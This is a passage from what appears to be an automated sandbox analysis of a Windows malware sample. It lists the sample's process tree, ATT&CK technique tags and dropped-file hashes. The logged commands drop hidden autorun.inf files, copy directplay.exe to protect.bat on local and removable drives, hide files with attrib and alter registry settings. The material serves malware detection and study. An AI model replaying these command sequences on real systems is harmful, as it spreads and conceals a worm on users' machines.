C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"4⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"4⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT6⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"6⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"6⤵
- Sets file to hidden
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\directplay.exe"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\directplay.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\directplay.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\directplay.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\directplay.exe" "F:\protect.bat"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\directplay.exe" "C:\protect.bat"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\directplay.exe"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\directplay.exe"6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\directplay.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\directplay.exe"6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 14284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 18724⤵
- Program crash
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2872 -ip 28721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2872 -ip 28721⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
2Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
256KB
MD5563088ad0f20fabf9dd62c6ba8ae1636
SHA1f9cd2fd153afa1a12ff990cf27c32b8c9c44e878
SHA256eb897bf202d32f067728f1b666eb16e9926557efa8676b72db11411013030184
SHA5128229dfb1d96b6a34b91b1e5c463833e7859331be880f585c48af1ba0ace0465ac755c7f22a9e6f30284266165f850e8f85af76157eea8136b2d6f79db02d3092
-
Filesize
1024KB
MD5dfad5f9213d2bd08c5b80b85b025c47c
SHA1fc9073e3eaefc942d33260771abb930aab3c9e88
SHA256b9d0632bf2065da9be082d49a20f208db30dda07ec4f82987589584571dba5d7
SHA51204da5ea7f51912f94796d596d2933d7922ae546a4e180499828f768b211b21f8d55967ad34836988b727f7f380554153e25f7788865807b846c9bfa96562a343
-
Filesize
68KB
MD5265a26150cf521e21ee5df8927c9757b
SHA19f533ea6ddfac589299b118581addd18bfd55ff0
SHA256e9d0a26eae436a00147ae27064aeaea93ad8a29bee919ef877fdcf6db638f949
SHA512ed7bf54683282cd76c3dea6322cec7e3b1d4a1bbb56fe4517e0f0bad8bfe3cbaffb387c36a9a1269b622bf64475bc21fb0bb643aae038ca656646933332a280f
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
1KB
MD58cccf1bccda5cd2661261f744228d128
SHA1f15a0d6a944fde04f8ee47a9ce521019313d7532
SHA256ea6bc039f25f8f20f77638bd35158371ecf7f3fce654a137a857b1207fd7529f
SHA512a1d182cbc9fa131ef2f0346077d261e97b249361c063ca5015692d88e60c7a688a4c8242b1b434aa660adaebb4ca1661ee38cc4fb9c5e71a001320477dc1064b
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
25KB
MD5212ddd77efd824768ef4988e5ace6cce
SHA1a4075151428b170d8413960d948165ef501871dd
SHA256c301e161d731d051c30e1b66c8cd9dd1fde1f5fac84895aa55c527bbed92dc41
SHA5127b17253f1c8f37c68e00cf6830c1a62c5fd6617a22c5594ecc76787bef26f0d4632a1a5f3ded86b225ca9270d314f2465037e0c06597e19b3ecd90ab544d896f
-
Filesize
219B
MD53676ba592a32bb9434599226129d6825
SHA18f0612c1bcd02447b2e71268f704fed6d8b94e18
SHA256416ae91ed63c27575f531034919192d8f5263c525c05a775d0948c55f5b43437
SHA51239033c35de4d495584e2d8be606f58e5a07acb4c6f426a757a9f16c1b1ff8015fc9898aee8acd12aa5b768dfdff49e510f4573d48cb2ab08b13b7f2d2eb8a813
-
Filesize
34KB
MD55a630ca16e715633272d3994d4cfe79d
SHA1bc3f62845989685321dfdf568c338103d3fa1e8c
SHA2569a081ff2756d1b9b08538402a2f40b69f86d51b0a305f6d2c2ff29a0496f837e
SHA5120c75b1cff44bf25d234ab072d8dbc488c67bf3610a9be2d1b58c49ede29bf092d015cc79f62545043abdcc3e5aa3798149d40b8210d274c9743bf3b24a36262e
-
Filesize
535B
MD59cac34f332cf836e17fc2f2fa2bb71e4
SHA1d18afa52aeb5e2aa2c6d42bba50a0f7c9910dfb8
SHA256a1454355e66bc7f6d45301b83b1bbfd8b6aa5fd8c53c283f3ae10aba3d8950a7
SHA512b9ab7e6f465c6bcdfca25cd5e3f169771106e70cde4e946d887efc2676558b07eab1a0626b998406262f191f63e782a1a43bcf1e0654a1d7d98995deac534a1b
-
Filesize
324KB
MD54f59c88f3fff25777cc11e7dde4dcbbe
SHA1be6986bb247011a66c93496c4e3a5690cebaf8ce
SHA256f1dfd2d24e5d30dd2779f9e1102130b474257c9739d840f1e20f08ba174af64e
SHA5125e1d303eeb3f0f3c3f67b57dca77c13812308861319ca6c513a6a318924b646c1f4a582690cac202e8bcded9ddf1196ae2925d5a26f3dca61475f6ba32fbd264
-
Filesize
441B
MD5fa19559081b4ab5f084f93e66a9d42be
SHA18359e8bfe26390bb9bf36a553d0a59c0db711007
SHA256b23940134fec85d6d0fa7e02e737a9e1ec046a05714b190fb4e70e97b96b989b
SHA512345427a14b9544b8f811017363f8ca9a9f30be2783b7aeb0a1f145c3eadbe73fda7e20276087d4e0cbabd6dff9898ea49cbb23fca5f0875ef1dfc348822102cd
-
Filesize
191KB
MD505b8cb9d2b557f82ea2f3a19eda8a215
SHA18395f1efe3ae8448369ed01b8a0b293140f026e1
SHA2563ae65b27917940774699698a15f608298c2229c35f68a6a716f799b602a89388
SHA5128c763841555c4152da49bcf517d64b8677577f8e2b16bee3884bb08a545e111201291b776e5ea3eb3c6c5f3bd85a6591796671f420c2d0e442a8f230db729f0d
-
Filesize
63B
MD5f64baf418f685884efec59a9d80bc5f6
SHA19c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9
SHA2564b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f
SHA512dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
376KB